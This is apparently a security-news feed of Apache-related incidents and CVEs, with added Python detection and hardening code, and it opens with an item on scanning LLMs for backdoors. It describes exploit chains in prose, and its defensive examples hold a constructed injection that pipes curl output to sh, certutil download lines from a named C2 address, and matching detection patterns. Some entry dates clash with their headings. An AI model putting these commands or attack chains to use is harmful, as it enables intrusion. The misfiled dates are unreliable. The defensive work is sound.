Microsoft developed a scanner to detect hidden backdoors in open-weight AI models, addressing risks for enterprises relying on third-party large language models (LLMs). The tool identifies three key indicators:
1. Attention shifts when a hidden trigger is present.
2. Leakage of poisoned training data.
3. Partial triggers still activating malicious responses.
The scanner extracts memorized content from models and ranks suspicious substrings as potential triggers.
### Conclusion
This week’s incidents underscore a shift in attacker tactics: exploiting trust in ecosystems, AI workflows, and supply chains rather than relying on traditional malware. As threats evolve, organizations must monitor integrations, verify updates, and secure AI deployments to mitigate risks from both state-sponsored actors and cybercriminals.
OCTOBER 2025
Ransomware | 30 Oct 2025 | ASF | Score 729 -> 620 (CRITICAL, impact -109) | Incident ID: THE2202022103125
Apache Software Foundation (Apache OpenOffice)
Alleged Akira Ransomware Breach of Apache OpenOffice
The Akira ransomware group claims to have breached Apache OpenOffice, stealing 23GB of sensitive data, including employee records (physical addresses, phone numbers, driver’s licenses, social security cards, credit card details), financial records, internal confidential files, and problem reports related to the application. The group threatens to leak the data publicly on its dark web site. While the breach remains unverified by the Apache Software Foundation, the potential exposure of employee PII (Personally Identifiable Information) and internal corporate documents poses a significant risk. The attack does not appear to impact end-users or the OpenOffice software distribution system, as the download infrastructure is separate from the compromised development servers. Akira, a ransomware-as-a-service (RaaS) group known for double extortion (data theft + encryption), has targeted organizations globally, earning millions in ransom payments. The group’s claim suggests a targeted breach aimed at extorting the foundation by leveraging stolen employee and financial data.
SEPTEMBER 2025 - score 728
AUGUST 2025 - score 726
JULY 2025
Vulnerability | 10 Jul 2025 | ASF | Score 728 -> 724 (CRITICAL, impact -4) | Incident ID: THE409071125
Apache Foundation
Opossum Attack
The Opossum attack exploits a sophisticated cross-protocol application layer desynchronization vulnerability that compromises TLS-based communications. This attack affects critical protocols including HTTP, FTP, POP3, SMTP, LMTP, and NNTP. By leveraging man-in-the-middle positioning, attackers can inject unexpected messages into secure channels, causing persistent desynchronization between clients and servers and breaking the integrity assumptions of encrypted communications. This vulnerability enables session hijacking, content manipulation, and XSS attacks, posing a significant threat to the organization's security.
JUNE 2025
Vulnerability | 16 Jun 2025 | ASF | Score 737 -> 727 (LOW, impact -10) | Incident ID: THE754071625
Apache
Apache Tomcat Coyote Engine Vulnerability CVE-2025-53506
A newly disclosed flaw in Apache Tomcat’s Coyote engine, tracked as CVE-2025-53506, has been identified. The vulnerability allows a remote attacker to exhaust the server’s thread pool and force the container into a prolonged denial-of-service state by repeatedly initiating streams that are never closed. This issue affects various maintained branches and has been scored 6.3 by CVSS v4. Modern reverse proxies can mitigate the attack by enforcing a SETTINGS-ack timeout or hard stream ceiling until full patch deployment.
Vulnerability | 16 Jun 2025 | ASF | Score 737 -> 727 (CRITICAL, impact -10) | Incident ID: THE1768841873
Apache Software Foundation: Apache bRPC Vulnerability Enables Remote Command Injection Attacks
Critical Remote Command Injection Vulnerability in Apache bRPC (CVE-2025-60021)
Critical Remote Command Injection Vulnerability Discovered in Apache bRPC
A severe remote command-injection vulnerability (CVE-2025-60021) has been identified in Apache bRPC, a widely used open-source Remote Procedure Call (RPC) framework. The flaw affects all versions prior to 1.15.0 and stems from inadequate input validation in the built-in heap-profiler service endpoint (`/pprof/heap`), which drives jemalloc memory profiling.
The endpoint passes the `extra_options` request parameter into the command line of the profiling tool without sanitizing it, so an attacker can append shell syntax of their choosing and run arbitrary commands with the privileges of the bRPC service process. Exploitation is straightforward: the service hands the raw parameter to the tool and no other control stands in the way.
Organizations using Apache bRPC in distributed systems face significant risk, particularly where the heap-profiler endpoint is reachable from untrusted networks or the service runs with elevated privileges. Successful exploitation can lead to full system compromise, data exfiltration, lateral movement or persistent backdoor deployment.
The Apache bRPC project has released version 1.15.0, which implements proper input validation to mitigate the flaw. Alternatively, organizations can apply a targeted security patch (GitHub pull request #3101) if immediate upgrades are not feasible. Security teams are advised to audit deployments, restrict access to the vulnerable endpoint, and monitor for suspicious activity.
The vulnerability was responsibly disclosed by researcher Simcha Kosman, with additional technical details available via the official CVE record and Apache bRPC security advisories.
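The injection pattern and its fix, as an added Python illustration rather than bRPC's own C++ code: `unsafe_command` shows the vulnerable shape (the query parameter spliced into a shell command string) and `safe_argv` shows the allow-list plus shell-free `argv` approach that the 1.15.0 fix amounts to. The flag names in `ALLOWED_FLAGS`, the `pprof` binary name, the paths and the hostile inputs are assumptions for the demonstration, not values from the advisory.

```python
"""Command-argument injection in a profiler endpoint: the vulnerable shape beside an allow-list fix.
Illustrative Python, not bRPC's C++; only `extra_options` is attacker-controlled, mirroring the
query parameter described in the advisory. Flag names and paths are assumptions."""
import re
import shlex
import subprocess
from typing import List


class RejectedOption(ValueError):
    """Raised when a user-supplied profiler option is not on the allow-list."""


def unsafe_command(binary_path: str, heap_profile: str, extra_options: str) -> str:
    """Vulnerable pattern: the raw query parameter is spliced into a shell command line."""
    return f"pprof --text {extra_options} {binary_path} {heap_profile}"


# Hypothetical allow-list of profiler switches; the real tool's documented options go here.
ALLOWED_FLAGS = {"--text", "--svg", "--lines", "--functions", "--inuse_space", "--alloc_space", "--base"}
# Option values may only contain characters that can never be shell or option syntax.
_PLAIN_VALUE = re.compile(r"^[A-Za-z0-9_./-]+$")


def safe_argv(binary_path: str, heap_profile: str, extra_options: str) -> List[str]:
    """Tokenise like a shell would, validate every token, and build an argv that never sees a shell."""
    argv = ["pprof"]
    for token in shlex.split(extra_options):
        flag, has_value, value = token.partition("=")
        if flag not in ALLOWED_FLAGS:
            raise RejectedOption(f"refused profiler option {token!r}")
        if has_value and not _PLAIN_VALUE.match(value):
            raise RejectedOption(f"refused option value in {token!r}")
        argv.append(token)
    return argv + [binary_path, heap_profile]


def is_rejected(extra_options: str) -> bool:
    """True when the validator refuses the option string (unbalanced quotes count as refused)."""
    try:
        safe_argv("/srv/app", "/tmp/heap.0001.heap", extra_options)
        return False
    except ValueError:  # RejectedOption is a ValueError; shlex raises ValueError on bad quoting
        return True


def run_profiler(argv: List[str]) -> subprocess.CompletedProcess:
    """Execute without a shell: argv elements go straight to execve, so ';', '|' and $() are inert."""
    return subprocess.run(argv, shell=False, capture_output=True, timeout=60, check=False)


if __name__ == "__main__":
    hostile = "--text; curl http://attacker.invalid/x | sh"  # constructed hostile input
    print("shell string:", unsafe_command("/srv/app", "/tmp/heap.0001.heap", hostile))
    print("rejected:", is_rejected(hostile))
    print("argv:", safe_argv("/srv/app", "/tmp/heap.0001.heap", "--lines --base=/tmp/heap.0000.heap"))
```

The two defenses are independent and both matter: the allow-list keeps unknown switches (and anything that is not a switch) out, and `shell=False` guarantees that even an accepted value is delivered as one argv element rather than reinterpreted by `/bin/sh`.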
MAY 2025 • 745
Vulnerability • 01 May 2025 • ASF
Next.js, D-Link, Apache and Netgear: Cyberattack Trends & Variations: What Our Honeypots Reveal
Honeypot Data Reveals Persistent Cyber Threats: A Year in Exploit Trends (2025–2026)
735 • CRITICAL-10 • NETVERDLITHE1780583187
Between May 2025 and May 2026, a global network of honeypots recorded over 9.2 million security events from 54,000 unique IP addresses across 163 countries, offering a snapshot of evolving cyber threats. The data, collected from strategically deployed decoy systems, shows sustained attacker interest in exposed services: SSH accounted for 75% of events, which reinforces the risk of exposing the protocol directly to the internet. Web applications (10%) and SMTP services (10%) followed, while attacks on medical protocols remained negligible.
### Top Exploited Vulnerabilities
Nine vulnerabilities stood out for their high exploitation rates, led by React2Shell (CVE-2025-55182), a critical flaw in Next.js servers. Disclosed in December 2025, it triggered a surge in attacks, with six IP addresses accounting for 90% of December's activity. Other notable targets included:
- ProxyLogon/ProxyShell/ProxyNotShell (Microsoft Exchange): Persistent exploitation since 2021, leveraging unpatched servers for SYSTEM-level access.
- Shellshock (CVE-2014-6271): A decade-old Bash vulnerability still actively probed for initial access.
- ThinkPHP (CVE-2018-25270): Sustained attacks on the Chinese PHP framework post-2026 disclosure.
- Log4Shell (CVE-2021-44228): Declining but still targeted, reflecting its historical impact.
- Legacy Router Flaws: D-Link DIR-645 (CVE-2015-2051) and Netgear DGN1000/DGN2000 (CVE-2024-12847) saw renewed activity, tied to campaigns such as RondoDox.
- CrushFTP (CVE-2025-54309): A single, concentrated attack on October 13, 2025, exploiting a race-condition flaw.
### Key Observations
- Web applications faced relentless attacks, with CVEs like React2Shell and ProxyShell driving spikes.
- Routers and IoT devices remained prime targets, often via decade-old vulnerabilities.
- Exploit timelines varied: Some flaws (e.g., CrushFTP) saw brief, intense campaigns, while others (e.g., Shellshock) endured as persistent threats.
- Attacker behavior aligned globally, with honeypot operators reporting similar patterns.
The data underscores the longevity of high-impact vulnerabilities and the risks of unpatched systems, even years after disclosure. Honeypots continue to serve as critical tools for detecting emerging threats and attacker methodologies.
Vulnerability • 01 May 2025 • ASF • Apache Software Foundation
Apache Tomcat HTTP/2 'Made You Reset' Denial-of-Service Vulnerability (CVE-2025-48989)
735 • MEDIUM-10 • THE738081425
CVE-2025-48989, dubbed 'Made You Reset', is a denial-of-service vulnerability in Apache Tomcat's HTTP/2 implementation. A client sends frames that violate the protocol on an otherwise valid stream (a zero-increment WINDOW_UPDATE is one such trigger) so that the server itself resets the stream with RST_STREAM. Because a server-initiated reset is not counted against the client's concurrent-stream limit while the request already queued behind it keeps being processed, an attacker can multiplex an unbounded amount of work over a single connection until the JVM runs out of heap, throws an OutOfMemoryError and stops responding. The attack needs no authentication, only network access to an HTTP/2 listener. Tomcat 9.0.0 through 11.0.9 is affected; the fixes shipped in 9.0.108, 10.1.44 and 11.0.10, and end-of-life branches never received them, so legacy deployments stay exposed. Unpatched servers face outages, the cost of downtime and reputational damage. Beyond upgrading, rate-limit connections and streams at the proxy and alert on abnormal heap growth or reset rates, which is how the attack announces itself.
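The proxy-side mitigations named for CVE-2025-53506 (a SETTINGS-ACK timeout and a hard stream ceiling) and the reset-rate limit that blunts 'Made You Reset' (CVE-2025-48989), as one added Python example that serves both Tomcat HTTP/2 passages on this page. It is not Tomcat code: it parses real 9-octet HTTP/2 frame headers, keeps per-connection state, and runs constructed traffic shapes through the guard. The thresholds (100 streams, a 5-second ACK deadline, 50 resets per second) are assumptions chosen for the demonstration.

```python
"""Per-connection HTTP/2 guard: hard stream ceiling, SETTINGS-ACK deadline, reset-rate limit.
Added illustration of the proxy-side mitigations discussed for CVE-2025-53506 and CVE-2025-48989;
not Tomcat code. Thresholds are assumptions chosen for the demonstration."""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Frame type codes and flags from RFC 9113, section 6.
DATA, HEADERS, RST_STREAM, SETTINGS = 0x0, 0x1, 0x3, 0x4
FLAG_END_STREAM = 0x1  # on DATA and HEADERS
FLAG_ACK = 0x1         # on SETTINGS


def parse_frame_header(buf: bytes) -> Tuple[int, int, int, int]:
    """Split a 9-octet frame header into (length, type, flags, stream_id)."""
    if len(buf) < 9:
        raise ValueError("an HTTP/2 frame header is 9 octets")
    length = int.from_bytes(buf[0:3], "big")
    stream_id = int.from_bytes(buf[5:9], "big") & 0x7FFFFFFF  # drop the reserved bit
    return length, buf[3], buf[4], stream_id


def build_frame_header(ftype: int, flags: int, stream_id: int, length: int = 0) -> bytes:
    """Inverse of parse_frame_header; used only to construct the sample traffic below."""
    return length.to_bytes(3, "big") + bytes([ftype, flags]) + stream_id.to_bytes(4, "big")


@dataclass
class ConnectionGuard:
    max_streams: int = 100              # enforced whether or not the client ever ACKs our SETTINGS
    settings_ack_deadline: float = 5.0  # seconds the client has to ACK the server's initial SETTINGS
    reset_window: float = 1.0           # sliding window, in seconds, for counting RST_STREAM frames
    max_resets_per_window: int = 50
    settings_sent_at: Optional[float] = None
    settings_acked: bool = False
    open_streams: Set[int] = field(default_factory=set)
    reset_times: List[float] = field(default_factory=list)

    def server_sent_settings(self, now: float) -> None:
        self.settings_sent_at = now

    def on_frame(self, header: bytes, now: float, from_client: bool) -> Optional[str]:
        """Return a close reason if this frame pushes the connection past a limit, else None."""
        _, ftype, flags, sid = parse_frame_header(header)
        if from_client and ftype == SETTINGS and flags & FLAG_ACK:
            self.settings_acked = True
        # CVE-2025-53506 shape: a client that never ACKs SETTINGS gets no unlimited stream budget.
        if (from_client and not self.settings_acked and self.settings_sent_at is not None
                and now - self.settings_sent_at > self.settings_ack_deadline):
            return "SETTINGS not acknowledged within deadline"
        if from_client and ftype == HEADERS and sid not in self.open_streams:
            if len(self.open_streams) >= self.max_streams:
                return f"stream ceiling {self.max_streams} exceeded"
            self.open_streams.add(sid)
        if ftype == RST_STREAM:
            # Count resets from both sides: in 'Made You Reset' the *server* emits the RST_STREAM.
            self.open_streams.discard(sid)
            self.reset_times = [t for t in self.reset_times if now - t <= self.reset_window] + [now]
            if len(self.reset_times) > self.max_resets_per_window:
                return f"more than {self.max_resets_per_window} resets in {self.reset_window}s"
        if not from_client and ftype in (DATA, HEADERS) and flags & FLAG_END_STREAM:
            self.open_streams.discard(sid)  # response finished: stream closed normally
        return None


def _run(guard: ConnectionGuard, frames) -> Optional[str]:
    """Feed (header, now, from_client) tuples until the guard returns a verdict."""
    for header, now, from_client in frames:
        verdict = guard.on_frame(header, now, from_client)
        if verdict:
            return verdict
    return None


def simulate_unacked_flood(n_streams: int = 150) -> Optional[str]:
    """Client ignores the server's SETTINGS and keeps opening streams it never closes."""
    guard = ConnectionGuard()
    guard.server_sent_settings(0.0)
    return _run(guard, ((build_frame_header(HEADERS, 0, 2 * i + 1, 30), 0.01 * i, True) for i in range(n_streams)))


def simulate_reset_storm(n_streams: int = 60) -> Optional[str]:
    """Every client HEADERS is answered by a server RST_STREAM: the 'Made You Reset' pattern."""
    guard = ConnectionGuard()
    guard.server_sent_settings(0.0)
    guard.on_frame(build_frame_header(SETTINGS, FLAG_ACK, 0), 0.0, True)
    frames = []
    for i in range(n_streams):
        frames.append((build_frame_header(HEADERS, 0, 2 * i + 1, 30), 0.001 * i, True))
        frames.append((build_frame_header(RST_STREAM, 0, 2 * i + 1, 4), 0.001 * i, False))
    return _run(guard, frames)


def simulate_well_behaved(n_requests: int = 300) -> Optional[str]:
    """Client ACKs SETTINGS; each request is answered and its stream closed before the next."""
    guard = ConnectionGuard()
    guard.server_sent_settings(0.0)
    guard.on_frame(build_frame_header(SETTINGS, FLAG_ACK, 0), 0.05, True)
    frames = []
    for i in range(n_requests):
        frames.append((build_frame_header(HEADERS, FLAG_END_STREAM, 2 * i + 1, 30), 0.1 + 0.01 * i, True))
        frames.append((build_frame_header(HEADERS, FLAG_END_STREAM, 2 * i + 1, 60), 0.1 + 0.01 * i, False))
    return _run(guard, frames)
```

Two design choices carry the defense: the stream ceiling is applied regardless of whether the client acknowledged SETTINGS, which is the gap CVE-2025-53506 exploited, and the reset counter includes server-emitted RST_STREAM frames, which is what distinguishes 'Made You Reset' from the earlier Rapid Reset pattern where the client sent the resets. A client whose first frame arrives after the ACK deadline without an acknowledgement is closed immediately.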
APRIL 2025 • 749
Vulnerability • 12 Apr 2025 • ASF • Apache
Apache SeaTunnel RESTful API Vulnerability
744 • CRITICAL-5 • THE302062025
A significant vulnerability (CVE-2025-32896) was discl

osed in Apache SeaTunnel, a widely used distributed data-integration platform. The RESTful API-v1 implementation failed to enforce access controls on the `/hazelcast/rest/maps/submit-job` endpoint, so an unauthenticated user could submit a job whose configuration makes the engine read arbitrary files and deserialize attacker-controlled data, potentially leading to remote code execution (RCE) and full control of the SeaTunnel instance. Versions 2.3.1 through 2.3.10 are affected; the issue was reported on April 12, 2025. Until the deployment is upgraded, keep the v1 REST API off untrusted networks.
MARCH 2025 • 753
Vulnerability • 01 Mar 2025 • ASF • Apache Software
Critical RCE Flaw in Apache Tomcat
748 • CRITICAL-5 • THE318031825
The Apache Software Foundation disclosed a critical remote code execution flaw in its widely used Tomcat web container (CVE-2025-24813). With a public proof of concept in circulation, attackers can take over a vulnerable server with a single crafted PUT request followed by a request that triggers deserialization of the uploaded content. Exploitation requires that the default servlet allow writes (`readonly` set to `false`; the default is read-only), that partial PUT support be enabled (the default), and, for code execution, that the application use file-based session persistence together with a deserialization gadget on the classpath. Where those conditions hold, the result is unauthorized access to sensitive data, service disruption and full system takeover, with data breaches and operational downtime for enterprises that run their Java web applications on Tomcat.
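A check for the configuration precondition, as an added Python example (not Tomcat's own tooling): it parses a Tomcat `web.xml` (the global `conf/web.xml` or a webapp's `WEB-INF/web.xml`), finds the `DefaultServlet` declaration and reports a `readonly=false` setting, noting when partial PUT is also left at its default. The two `web.xml` documents are constructed for the demonstration, not copied from any deployment.

```python
"""Audit a Tomcat web.xml for a writable DefaultServlet, the precondition for PUT-based upload attacks.
Added example, not Tomcat tooling. Parsing is namespace-agnostic so the same code reads the
Java EE (Tomcat 9) and Jakarta EE (Tomcat 10/11) schemas."""
import xml.etree.ElementTree as ET
from typing import Dict, List

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"


def _local(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem: ET.Element, name: str) -> str:
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""


def default_servlet_params(web_xml: str) -> Dict[str, str]:
    """Collect the init-params of the servlet whose class is DefaultServlet (empty dict if none)."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) == "servlet" and _child_text(servlet, "servlet-class") == DEFAULT_SERVLET_CLASS:
            return {
                _child_text(param, "param-name"): _child_text(param, "param-value")
                for param in servlet if _local(param.tag) == "init-param"
            }
    return {}


def audit(web_xml: str) -> List[str]:
    """Return findings; Tomcat's defaults are readonly=true and allowPartialPut=true."""
    params = default_servlet_params(web_xml)
    findings: List[str] = []
    if params.get("readonly", "true").strip().lower() == "false":
        findings.append("DefaultServlet readonly=false: PUT/DELETE can write into the webapp")
        if params.get("allowPartialPut", "true").strip().lower() != "false":
            findings.append("allowPartialPut left enabled with writes on: the CVE-2025-24813 upload path is reachable")
    return findings


# Constructed configs (not copied from any deployment). The vulnerable one is what an administrator
# who enabled WebDAV-style uploads on the default servlet typically ends up with.
VULNERABLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>"""

HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace("<param-value>false</param-value>", "<param-value>true</param-value>")

if __name__ == "__main__":
    for label, doc in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit(doc) or ["no findings"])
```

Run it over every `web.xml` in the estate, not only the global one: a webapp can redeclare the default servlet with its own init-params, and that is where a write-enabled configuration tends to hide.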
JANUARY 2025 • 757
Vulnerability • 01 Jan 2025 • ASF
Apache Software Foundation: Apache Hadoop Vulnerability Exposes Systems to Crashes and Data Corruption
Critical Vulnerability in Apache Hadoop HDFS Native Client Exposes Systems to Crashes and Data Corruption
752 • CRITICAL-5 • THE1769425022
A memory-safety vulnerability in Apache Hadoop's HDFS native client, tracked as CVE-2025-27821, has been disclosed, posing risks of crashes, memory corruption and data loss in production environments. The flaw, discovered by security researcher BUI Ngoc Tan, is an out-of-bounds write in the URI parser of the native client: a crafted URI from an untrusted source can overwrite memory beyond the allocated buffer.
The vulnerability affects organizations that use the HDFS native client in data pipelines and cluster management. Exploitation could cause denial of service, memory corruption or complete unavailability of the client, with heightened consequences for enterprises handling sensitive data on the affected clusters.
Apache rates the flaw as moderate severity but urges prompt action, recommending that all affected users upgrade to Hadoop 3.4.2 or later, which contains the fix. Systems running earlier versions remain exposed.
To mitigate risks, administrators are advised to:
- Conduct an immediate version audit of Hadoop deployments.
- Monitor HDFS logs for suspicious URI patterns.
- Implement network-level access controls to restrict HDFS client connections to trusted sources.
- Review and update patch management procedures to prioritize this vulnerability.
The discovery underscores the importance of timely updates in distributed storage frameworks, particularly in mission-critical big data infrastructure.
JUNE 2024 • 759
Vulnerability • 16 Jun 2024 • ASF • Apache Software Foundation
Critical Vulnerability in Apache Pinot (CVE-2024-56325)
754 • CRITICAL-5 • THE659030725
CVE-2024-56325, an authentication bypass in Apache Pinot rated CVSS 9.8, affects versions prior to 1.3.0. Organizations running those versions risk unauthorized data access, record injection or service disruption in the real-time analytics dashboards, financial monitoring and IoT data-processing workloads Pinot typically serves. Given the remote exploitability and the impact on confidentiality, integrity and availability, upgrade immediately and audit for suspicious access patterns. The flaw is a reminder that authentication in distributed systems needs defense in depth, and that software composition analysis is how you find the vulnerable versions still running in the estate.
FEBRUARY 2024 • 763
Vulnerability • 15 Feb 2024 • ASF
Apache Software Foundation: Threat Actors Exploit Apache ActiveMQ Server Vulnerability to Gain RDP Access and Deploy LockBit Ransomware
Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack in 19-Day Intrusion
758 • CRITICAL-5 • THE1772000706
A critical remote code execution vulnerability in Apache ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat actors to deploy LockBit ransomware across an enterprise network, spanning 19 days from initial access to full encryption. The attack began in mid-February 2024, targeting a publicly exposed Windows server running the vulnerable messaging broker.
The intrusion started when attackers sent a malicious OpenWire command to the ActiveMQ server, forcing it to load a remote Java Spring XML configuration file. This triggered the download of a Metasploit stager via Windows CertUtil, establishing a command-and-control (C2) channel to 166.62.100[.]52. Within 40 minutes, the threat actors escalated to SYSTEM-level privileges, dumped credentials from LSASS process memory, and began lateral movement.
Though defenders evicted the attackers on the second day, the unpatched ActiveMQ server remained vulnerable. Eighteen days later, the same threat actors re-entered using the identical exploit, this time leveraging a stolen privileged service account obtained during the first intrusion. Upon return, they confirmed domain administrator access, deployed a disguised network scanner (Advanced IP Scanner masquerading as SoftPerfect Network Scanner), and moved LockBit ransomware executables (LB3.exe, LB3_pass.exe) via RDP sessions.
Ransomware execution varied by target: file and backup servers received specific path and password arguments, while other hosts were infected by double-click execution. Ransom notes directed victims to Session private messaging, which suggests the attackers used the leaked LockBit Black builder rather than official LockBit infrastructure.
The total "Time to Ransomware" was 419 hours (19 days), though the second intrusion could have led to encryption in under 90 minutes if undetected. Attackers also wiped event logs, installed AnyDesk for persistence, and disabled Windows Defender using SystemSettingsAdminFlows.exe on an Exchange server.
Key Indicators of Compromise (IOCs):
- C2 Server: `166.62.100[.]52`
- Ransomware Executables:
  - `LB3.exe` (SHA-256 `8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6`)
  - `LB3_pass.exe` (SHA-256 `C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE`)
- Disguised Tools:
  - `netscan.exe` (SHA-256 `87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55`)
  - `advanced_ip_scanner.exe` (SHA-256 `722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B`)
- AnyDesk Client ID: `1148037084`
The attack highlights the risks of unpatched critical vulnerabilities, credential theft via LSASS, and rapid lateral movement in ransomware operations.
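An added Python example (not from the incident report) that turns the indicators above into a sweep: it hashes every file under a directory against the SHA-256 list, and scans log lines for the refanged C2 address, a `certutil -urlcache` download and an AnyDesk install. It also looks for the `ClassPathXmlApplicationContext` marker of the public CVE-2023-46604 exploit technique; that marker is my addition, not an IOC the report lists. The directory tree and the log lines are constructed for the demonstration.

```python
"""Sweep a directory and a log for the ActiveMQ/LockBit intrusion indicators (hashes, C2 address, tooling).
Added example, not from the incident report. Hash values and the C2 address come from the IOC list above;
the ClassPathXmlApplicationContext marker is the public CVE-2023-46604 exploit technique, added here.
Sample files and log lines are constructed."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

KNOWN_HASHES: Dict[str, str] = {h.lower(): label for h, label in (
    ("8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6", "LB3.exe (LockBit 3.0)"),
    ("C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE", "LB3_pass.exe (LockBit 3.0)"),
    ("87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55", "netscan.exe (SoftPerfect)"),
    ("722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B", "advanced_ip_scanner.exe"),
)}
C2_IP = "166.62.100[.]52".replace("[.]", ".")  # refang the defanged indicator before matching

LOG_PATTERNS: List[Tuple[str, "re.Pattern"]] = [
    ("c2-ip", re.compile(re.escape(C2_IP))),
    ("certutil-download", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)),
    ("openwire-spring-xml", re.compile(r"ClassPathXmlApplicationContext", re.I)),
    ("anydesk-install", re.compile(r"\bAnyDesk\b", re.I)),
]


def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep_files(root: Path, known: Dict[str, str] = KNOWN_HASHES) -> List[Tuple[Path, str]]:
    """Hash every regular file under root and report those on the watch-list."""
    hits = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        label = known.get(sha256_of(path))
        if label:
            hits.append((path, label))
    return hits


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, pattern name, line) for every indicator match, one entry per pattern."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for name, pattern in LOG_PATTERNS:
            if pattern.search(line):
                hits.append((lineno, name, line))
    return hits


def build_sample_tree() -> Path:
    """Create a throwaway directory with constructed files and return its path."""
    root = Path(tempfile.mkdtemp(prefix="ioc-demo-"))
    (root / "tools").mkdir()
    (root / "tools" / "scanner.exe").write_bytes(b"constructed sample, not a real binary\n")
    (root / "readme.txt").write_bytes(b"nothing to see here\n")
    return root


# Constructed log lines in the style of a Windows process-creation log and a broker log.
SAMPLE_LOG = [
    "2024-02-15 10:02:11 svchost.exe started normally",
    "2024-02-15 10:05:48 cmd.exe /c certutil.exe -urlcache -split -f http://166.62.100.52/poc.exe C:\\Temp\\p.exe",
    "2024-02-15 10:05:40 activemq.log: Error creating bean ... ClassPathXmlApplicationContext http://166.62.100.52/poc.xml",
    "2024-02-15 11:30:02 msiexec.exe /i AnyDesk.msi /qn",
]

if __name__ == "__main__":
    for lineno, name, line in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {name}")
    root = build_sample_tree()
    print("file hits:", sweep_files(root))  # empty: the constructed file is not the real LB3.exe
```

The constructed sample file does not match any real hash, so `sweep_files` returns nothing against the list above; to exercise the matching path, add the constructed file's own digest to a copy of the watch-list, which is what the test does. Remove the temporary directory with `shutil.rmtree` when you are done.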
JANUARY 2023 • 763
Vulnerability • 01 Jan 2023 • ASF
Apache Software Foundation: Claude Discovers 13-Year-Old RCE Vulnerability in Apache ActiveMQ Within Minutes
Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered by AI
761 • CRITICAL-2 • THE1775636935
A newly disclosed remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, had gone unnoticed for over 13 years. An AI assistant identified the flaw in about 10 minutes, illustrating the accelerating role of artificial intelligence in vulnerability research.
The vulnerability resides in ActiveMQ Classic's web-based management console, which exposes Java Management Extensions (JMX) operations through Jolokia, a REST API. Jolokia access was tightened after a 2023 vulnerability, but ActiveMQ's own management components (MBeans) remained fully reachable because the console depends on them, which left a critical gap.
Attackers exploit the flaw with a crafted request to the Jolokia API that invokes the broker's `addNetworkConnector` operation with a `vm://` URI whose `brokerConfig` parameter points at a remote XML file (`xbean:http://...`). The `vm://` transport starts an embedded broker from that configuration, so the broker fetches the attacker's XML over HTTP and instantiates the beans it declares, which is enough to run arbitrary code during connection setup and hand the attacker full control of the host.
Under normal conditions, exploitation requires administrative credentials (such as the default `admin:admin`). In ActiveMQ Classic 6.0.0 through 6.1.1, however, a separate flaw (CVE-2024-32114) left the Jolokia API unauthenticated by default, turning CVE-2026-34197 into an unauthenticated RCE.
The discovery was made by security researcher Naveen Sunkavally using Anthropic's Claude AI model, which analyzed the codebase to identify exposed endpoints and historical vulnerabilities. Compressing what is typically a weeks-long manual review into minutes shows how AI is reshaping vulnerability research.
Given ActiveMQ’s history as a target for ransomware and advanced threat actors, organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove risky `vm://` transport usage in remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious `vm://` URIs or `brokerConfig=xbean:http` patterns, and watching for unusual POST requests to `/api/jolokia/` containing `addNetworkConnector`.
The incident underscores the risks of legacy code paths and the growing efficiency of AI-driven security research.
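The monitoring advice above (POSTs to `/api/jolokia/` carrying `addNetworkConnector` with `vm://` or `brokerConfig=xbean:http`), as an added Python example that is not ActiveMQ code: it parses both Jolokia request forms, the JSON POST body and the GET path form in which Jolokia escapes `/` inside an argument as `!/` and `!` as `!!`, and flags only exec calls whose argument matches, so a legitimate `static:(tcp://...)` network connector is not reported. The requests are constructed; `attacker.invalid` is a reserved, non-routable name.

```python
"""Flag Jolokia requests that call addNetworkConnector with a vm:// or brokerConfig=xbean:http argument.
Added example, not from the advisory or ActiveMQ. Handles the JSON POST body and the GET path form
(Jolokia escapes '/' in an argument as '!/' and '!' as '!!'). Requests below are constructed."""
import json
import re
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import unquote

SUSPICIOUS_ARGUMENT = re.compile(r"vm://|brokerConfig=xbean:http", re.I)
EXEC_PATH_PREFIX = "/api/jolokia/exec/"


def _unescape_segment(segment: str) -> str:
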